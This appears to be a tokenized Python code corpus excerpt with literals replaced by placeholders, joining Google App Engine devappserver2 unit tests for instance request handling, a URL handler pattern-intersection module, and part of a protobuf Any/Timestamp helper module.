'<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_handle_no_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_reserve_background_thread_success ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reserve_background_thread_quitting ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _started = True <EOL> inst . _quitting = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reserve_background_thread_no_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_background_thread_capacity ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_not_started ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> inst . _quit = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_not_ready ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> , <EOL> expect_ready_request = True ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> def test_wait_with_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : <NUM_LIT:0> ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_waiting_for_can_accept ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> , <EOL> expect_ready_request = True ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . time = <NUM_LIT:0> <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : self . time ) <EOL> def advance_time ( * unused_args ) : <EOL> self . time += <NUM_LIT:10> <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( advance_time ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_timed_out_with_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( inst . wait ( <NUM_LIT:0> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_without_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . time = <NUM_LIT:0> <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : self . time ) <EOL> def advance_time ( * unused_args ) : <EOL> self . time += <NUM_LIT:10> <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( advance_time ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_timed_out_without_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:0> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_quit_while_starting ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) . WithSideEffects ( inst . quit ) <EOL> self . proxy . quit ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> def test_wait_quit_while_waiting ( self ) : <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : <NUM_LIT:0> ) <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:0> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( lambda * unused_args : inst . quit ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_health ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> inst . set_health ( False ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> inst . set_health ( True ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> def test_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> inst . quit ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> def test_quit_with_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . mox . VerifyAll ( ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . assertRaises ( instance . CannotQuitServingInstance , <EOL> inst . quit ) <EOL> def test_quit_with_request_force ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( force = True ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_quit_with_request_force_and_allow_async ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( force = True , allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_quit_with_request_allow_async ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertTrue ( inst . _quitting ) <EOL> def test_quit_shutdown ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertTrue ( inst . _expecting_shutdown_request ) <EOL> self . assertFalse ( inst . _quitting ) <EOL> def test_get_latency_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> now = time . time ( ) <EOL> inst . _request_history = [ ( now , now + <NUM_LIT:1> ) , ( now + <NUM_LIT:2> , now + <NUM_LIT:4> ) ] <EOL> self . assertEqual ( <NUM_LIT> , inst . get_latency_60s ( ) ) <EOL> def test_get_qps_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> now = time . time ( ) <EOL> inst . _request_history = [ ( now , now + <NUM_LIT:1> ) ] * <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , inst . get_qps_60s ( ) ) <EOL> def test__trim_request_history_to_60s ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> inst . _request_history . append ( ( <NUM_LIT:0> , <NUM_LIT:100> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> now = time . time ( ) <EOL> inst . _request_history . append ( ( now , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:1> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> inst . _request_history . append ( ( now + <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> inst . _trim_request_history_to_60s ( ) <EOL> self . assertEqual ( [ ( now , <NUM_LIT> ) , ( now + <NUM_LIT:1> , <NUM_LIT> ) , ( now + <NUM_LIT:3> , <NUM_LIT> ) , ( now + <NUM_LIT:4> , <NUM_LIT> ) ] , <EOL> list ( inst . _request_history ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from google . appengine . tools . devappserver2 import start_response_utils <EOL> class TestCapturingStartResponse ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_success ( self ) : <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> stream = start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stream . write ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . status ) <EOL> self . assertEqual ( None , start_response . exc_info ) <EOL> self . assertEqual ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , start_response . response_headers ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . response_stream . getvalue ( ) ) <EOL> def test_exception ( self ) : <EOL> exc_info = ( object ( ) , object ( ) , object ( ) ) <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> start_response ( '<STR_LIT>' , [ ] , exc_info ) <EOL> self . assertEqual ( '<STR_LIT>' , start_response . status ) <EOL> self . assertEqual ( exc_info , start_response . exc_info ) <EOL> self . assertEqual ( [ ] , start_response . response_headers ) <EOL> def test_merged_response ( self ) : <EOL> start_response = start_response_utils . CapturingStartResponse ( ) <EOL> stream = start_response ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stream . write ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> start_response . merged_response ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import fnmatch <EOL> import itertools <EOL> import re <EOL> class Handler ( object ) : <EOL> """<STR_LIT>""" <EOL> ALL_PROPERTIES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:type>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def __init__ ( self , pattern ) : <EOL> self . pattern = pattern <EOL> def _GetPattern ( self ) : <EOL> return self . _pattern <EOL> def _SetPattern ( self , the_pattern ) : <EOL> self . _pattern = the_pattern <EOL> self . _regex = re . compile ( re . escape ( the_pattern ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) + '<STR_LIT:$>' ) <EOL> self . is_literal = '<STR_LIT:*>' not in the_pattern <EOL> pattern = property ( _GetPattern , _SetPattern ) <EOL> @ property <EOL> def regex ( self ) : <EOL> return self . _regex <EOL> def Regexify ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . pattern . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) <EOL> def MatchesString ( self , pattern_str ) : <EOL> """<STR_LIT>""" <EOL> return self . _regex . match ( pattern_str ) is not None <EOL> def MatchesAll ( self , other_glob ) : <EOL> """<STR_LIT>""" <EOL> return self . MatchesString ( other_glob . pattern ) <EOL> def HasMoreSpecificPatternThan ( self , other_handler ) : <EOL> """<STR_LIT>""" <EOL> if self . is_literal != other_handler . is_literal : <EOL> return self . is_literal <EOL> return len ( self . pattern ) > len ( other_handler . pattern ) <EOL> def __eq__ ( self , other_handler ) : <EOL> return ( isinstance ( other_handler , Handler ) and <EOL> self . __dict__ == other_handler . __dict__ ) <EOL> def IsFullyHandledBy ( self , other_handler ) : <EOL> """<STR_LIT>""" <EOL> return ( other_handler . MatchesAll ( self ) and <EOL> self . _PropertiesMatch ( other_handler ) ) <EOL> def _PropertiesMatch ( self , other ) : <EOL> """<STR_LIT>""" <EOL> for prop in Handler . ALL_PROPERTIES : <EOL> if self . GetProperty ( prop ) not in ( None , other . GetProperty ( prop ) ) : <EOL> return False <EOL> return True <EOL> def _MakeHandlerList ( * pattern_strings ) : <EOL> return [ SimpleHandler ( a ) for a in pattern_strings ] <EOL> class SimpleHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pattern , properties = None ) : <EOL> super ( SimpleHandler , self ) . __init__ ( pattern ) <EOL> if properties : <EOL> self . properties = properties <EOL> else : <EOL> self . properties = { } <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . pattern , tuple ( sorted ( self . properties . items ( ) ) ) ) ) <EOL> def GetProperty ( self , prop , default = None ) : <EOL> return self . properties . get ( prop , default ) <EOL> def CreateOverlappedHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> return OverlappedHandler ( self . pattern , matchers = [ self ] ) <EOL> class OverlappedHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pattern , matchers = ( ) ) : <EOL> super ( OverlappedHandler , self ) . __init__ ( pattern ) <EOL> self . matchers = [ ] <EOL> for sub_handler in matchers : <EOL> self . AddMatchingHandler ( sub_handler ) <EOL> def GetProperty ( self , prop , default = None ) : <EOL> """<STR_LIT>""" <EOL> largest_handler = None <EOL> prop_value = default <EOL> for sub_handler in self . matchers : <EOL> if sub_handler . GetProperty ( prop ) is not None : <EOL> if ( not largest_handler or <EOL> sub_handler . HasMoreSpecificPatternThan ( largest_handler ) ) : <EOL> largest_handler = sub_handler <EOL> prop_value = sub_handler . GetProperty ( prop ) <EOL> return prop_value <EOL> def __eq__ ( self , other_handler ) : <EOL> return ( isinstance ( other_handler , OverlappedHandler ) and <EOL> self . pattern == other_handler . pattern and <EOL> set ( self . matchers ) == set ( other_handler . matchers ) ) <EOL> def AddMatchingHandler ( self , matcher ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( matcher , SimpleHandler ) : <EOL> self . matchers . append ( matcher ) <EOL> else : <EOL> self . matchers . extend ( matcher . matchers ) <EOL> def GetOrderedIntersection ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> results = _Intersect ( handler_list ) <EOL> results = sorted ( results , key = lambda h : h . pattern ) <EOL> _ReorderHandlers ( results ) <EOL> _GivePropertiesFromGeneralToSpecific ( results ) <EOL> return _RemoveRedundantHandlers ( results ) <EOL> def _RemoveRedundantHandlers ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> no_duplicates = [ ] <EOL> patterns_found_so_far = set ( ) <EOL> for i in xrange ( len ( handler_list ) ) : <EOL> current_handler = handler_list [ i ] <EOL> matched_by_later = False <EOL> for j in xrange ( i + <NUM_LIT:1> , len ( handler_list ) ) : <EOL> if current_handler . IsFullyHandledBy ( handler_list [ j ] ) : <EOL> matched_by_later = True <EOL> break <EOL> if ( not matched_by_later and <EOL> current_handler . pattern not in patterns_found_so_far ) : <EOL> no_duplicates . append ( current_handler ) <EOL> patterns_found_so_far . add ( current_handler . pattern ) <EOL> return no_duplicates <EOL> def _ReorderHandlers ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> for i , j in itertools . combinations ( xrange ( len ( handler_list ) ) , <NUM_LIT:2> ) : <EOL> if handler_list [ i ] . MatchesAll ( handler_list [ j ] ) : <EOL> handler_list [ i ] , handler_list [ j ] = handler_list [ j ] , handler_list [ i ] <EOL> def _GivePropertiesFromGeneralToSpecific ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> for i , j in itertools . combinations ( xrange ( len ( handler_list ) ) , <NUM_LIT:2> ) : <EOL> if handler_list [ j ] . MatchesAll ( handler_list [ i ] ) : <EOL> if isinstance ( handler_list [ i ] , SimpleHandler ) : <EOL> handler_list [ i ] = handler_list [ i ] . CreateOverlappedHandler ( ) <EOL> handler_list [ i ] . AddMatchingHandler ( handler_list [ j ] ) <EOL> def _Intersect ( handler_list ) : <EOL> """<STR_LIT>""" <EOL> if not handler_list : <EOL> return set ( ) <EOL> handlers = set ( [ handler_list [ <NUM_LIT:0> ] ] ) <EOL> for input_handler in handler_list [ <NUM_LIT:1> : ] : <EOL> new_handlers = set ( ) <EOL> for g in handlers : <EOL> new_handlers |= _IntersectTwoHandlers ( input_handler , g ) <EOL> handlers = new_handlers <EOL> return list ( handlers ) <EOL> def _IntersectTwoHandlers ( first_handler , second_handler ) : <EOL> """<STR_LIT>""" <EOL> shared_prefix = _SharedPrefix ( first_handler . pattern , second_handler . pattern ) <EOL> if shared_prefix : <EOL> return _HandleCommonPrefix ( first_handler , second_handler , shared_prefix ) <EOL> shared_suffix = _SharedSuffix ( first_handler . pattern , second_handler . pattern ) <EOL> if shared_suffix : <EOL> return _HandleCommonSuffix ( first_handler , second_handler , shared_suffix ) <EOL> handler_set = set ( ) <EOL> handler_set |= _HandleWildcardCases ( first_handler , second_handler ) <EOL> handler_set |= _HandleWildcardCases ( second_handler , first_handler ) <EOL> handler_set |= set ( [ first_handler , second_handler ] ) <EOL> return handler_set <EOL> def _HandleWildcardCases ( first_handler , second_handler ) : <EOL> """<STR_LIT>""" <EOL> merged_handlers = set ( ) <EOL> if len ( first_handler . pattern ) <= <NUM_LIT:1> or len ( second_handler . pattern ) <= <NUM_LIT:1> : <EOL> return merged_handlers <EOL> if ( first_handler . pattern [ - <NUM_LIT:1> ] , second_handler . pattern [ <NUM_LIT:0> ] ) != ( '<STR_LIT:*>' , '<STR_LIT:*>' ) : <EOL> return merged_handlers <EOL> first_no_star = first_handler . pattern [ : - <NUM_LIT:1> ] <EOL> merged_handlers . add ( SimpleHandler ( first_no_star + second_handler . pattern ) ) <EOL> if second_handler . MatchesString ( first_no_star ) : <EOL> merged_handlers . add ( SimpleHandler ( first_no_star ) ) <EOL> return merged_handlers <EOL> def _HandleCommonPrefix ( first_handler , second_handler , common_prefix ) : <EOL> """<STR_LIT>""" <EOL> stripped_first_handler = SimpleHandler ( <EOL> first_handler . pattern [ len ( common_prefix ) : ] , first_handler . properties ) <EOL> stripped_second_handler = SimpleHandler ( <EOL> second_handler . pattern [ len ( common_prefix ) : ] , second_handler . properties ) <EOL> stripped_handlers = _IntersectTwoHandlers ( stripped_first_handler , <EOL> stripped_second_handler ) <EOL> handlers = set ( ) <EOL> for stripped_handler in stripped_handlers : <EOL> handlers . add ( SimpleHandler ( common_prefix + stripped_handler . pattern , <EOL> stripped_handler . properties ) ) <EOL> return handlers <EOL> def _HandleCommonSuffix ( first_handler , second_handler , common_suffix ) : <EOL> """<STR_LIT>""" <EOL> stripped_first_handler = SimpleHandler ( <EOL> first_handler . pattern [ : - len ( common_suffix ) ] , first_handler . properties ) <EOL> stripped_second_handler = SimpleHandler ( <EOL> second_handler . pattern [ : - len ( common_suffix ) ] , second_handler . properties ) <EOL> stripped_handlers = _IntersectTwoHandlers ( <EOL> stripped_first_handler , stripped_second_handler ) <EOL> handlers = set ( ) <EOL> for stripped_handler in stripped_handlers : <EOL> handlers . add ( SimpleHandler ( stripped_handler . pattern + common_suffix , <EOL> stripped_handler . properties ) ) <EOL> return handlers <EOL> def _SharedPrefix ( pattern1 , pattern2 ) : <EOL> """<STR_LIT>""" <EOL> first_star1 = ( pattern1 + '<STR_LIT:*>' ) . find ( '<STR_LIT:*>' ) <EOL> first_star2 = ( pattern2 + '<STR_LIT:*>' ) . find ( '<STR_LIT:*>' ) <EOL> if ( first_star1 , first_star2 ) != ( len ( pattern1 ) , len ( pattern2 ) ) : <EOL> min_star = min ( first_star1 , first_star2 ) <EOL> if min_star and pattern1 [ : min_star ] == pattern2 [ : min_star ] : <EOL> return pattern1 [ : min_star ] <EOL> return '<STR_LIT>' <EOL> def _SharedSuffix ( pattern1 , pattern2 ) : <EOL> """<STR_LIT>""" <EOL> return _SharedPrefix ( pattern1 [ : : - <NUM_LIT:1> ] , pattern2 [ : : - <NUM_LIT:1> ] ) [ : : - <NUM_LIT:1> ] </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> from google . appengine . _internal import six <EOL> from google . net . proto2 . python . public . descriptor import FieldDescriptor <EOL> _TIMESTAMPFOMAT = '<STR_LIT>' <EOL> _NANOS_PER_SECOND = <NUM_LIT> <EOL> _NANOS_PER_MILLISECOND = <NUM_LIT> <EOL> _NANOS_PER_MICROSECOND = <NUM_LIT:1000> <EOL> _MILLIS_PER_SECOND = <NUM_LIT:1000> <EOL> _MICROS_PER_SECOND = <NUM_LIT> <EOL> _SECONDS_PER_DAY = <NUM_LIT> * <NUM_LIT> <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class ParseError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class Any ( object ) : <EOL> """<STR_LIT>""" <EOL> def Pack ( self , msg , type_url_prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if len ( type_url_prefix ) < <NUM_LIT:1> or type_url_prefix [ - <NUM_LIT:1> ] != '<STR_LIT:/>' : <EOL> self . type_url = '<STR_LIT>' % ( type_url_prefix , msg . DESCRIPTOR . full_name ) <EOL> else : <EOL> self . type_url = '<STR_LIT>' % ( type_url_prefix , msg . DESCRIPTOR . full_name ) <EOL> self . value = msg . SerializeToString ( ) <EOL> def Unpack ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> descriptor = msg . DESCRIPTOR <EOL> if not self . Is ( descriptor ) : <EOL> return False <EOL> msg . ParseFromString ( self . value ) <EOL> return True <EOL> def TypeName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . type_url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> def Is ( self , descriptor ) : <EOL> """<STR_LIT>""" <EOL> return self . TypeName ( ) == descriptor . full_name <EOL> class Timestamp ( object ) : <EOL> """<STR_LIT>""" <EOL> def ToJsonString ( self ) : <EOL> """<STR_LIT>""" <EOL> nanos = self . nanos % _NANOS_PER_SECOND <EOL> total_sec = self . seconds + ( self . nanos - nanos ) // _NANOS_PER_SECOND <EOL> seconds = total_sec % _SECONDS_PER_DAY <EOL> days = ( total_sec - seconds ) // _SECONDS_PER_DAY <EOL> dt = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) + timedelta ( days , seconds ) <EOL> result = dt . isoformat ( ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> if ( nanos % <NUM_LIT> ) == <NUM_LIT:0> : <EOL> return result + '<STR_LIT>' % ( nanos / <NUM_LIT> ) <EOL> return result + '<STR_LIT>' % nanos <EOL> def FromJsonString ( self , value ) : <EOL> """<STR_LIT>""" <EOL> timezone_offset = value . find ( '<STR_LIT>' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> timezone_offset = value . find ( '<STR_LIT:+>' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> timezone_offset = value . rfind ( '<STR_LIT:->' ) <EOL> if timezone_offset == - <NUM_LIT:1> : <EOL> raise ParseError ( 